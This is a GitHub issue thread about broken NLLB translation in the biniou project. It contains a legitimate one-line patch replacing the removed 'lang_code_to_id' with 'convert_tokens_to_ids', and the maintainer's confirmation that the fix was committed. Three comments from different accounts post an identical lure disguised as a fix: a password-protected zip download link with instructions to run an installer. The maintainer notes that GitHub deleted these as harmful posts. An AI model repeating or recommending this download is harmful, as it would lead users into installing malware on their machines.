### ISSUE TITLE
Nllb translation is broken (due to use of a formerly-deprecated symbol that has been deleted)

### ISSUE THREAD

**Issue by trolley813** [Woolverine94/biniou#31]
The `lang_code_to_id` in `transformers` library was deprecated sometime ago, so attempting to use the translator fails with
```
AttributeError: 'NllbTokenizerFast' object has no attribute 'lang_code_to_id'
```

As explained in huggingface/transformers#31348, the correct solution is to use `convert_tokens_to_ids` instead (I've tested and can confirm that it does indeed work).

Here's the patch:
```diff
--- a/ressources/nllb.py
+++ b/ressources/nllb.py
@@ -267,7 +267,7 @@ def text_nllb(
 
     translated_tokens = automodel_nllb.generate(
         **inputs_nllb,
-        forced_bos_token_id=tokenizer_nllb.lang_code_to_id[output_language_nllb],
+        forced_bos_token_id=tokenizer_nllb.convert_tokens_to_ids(output_language_nllb),
         max_new_tokens=max_tokens_nllb, 
     )
```

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Woolverine94** [comment]
Hello @trolley813,

Double thanks to you, both for : 

  - Reporting the issue and providing a fix for it.
  - Alerting users on the harmful posts that have been deleted by github since

I will provide a commit for fixing the nllb module ASAP based on your advices. 

Thanks again :+1:

**Comment by Woolverine94** [comment]
Commit 9ecd647 fix this issue. Credits go to @trolley813, both for reporting the issue and fixing it.
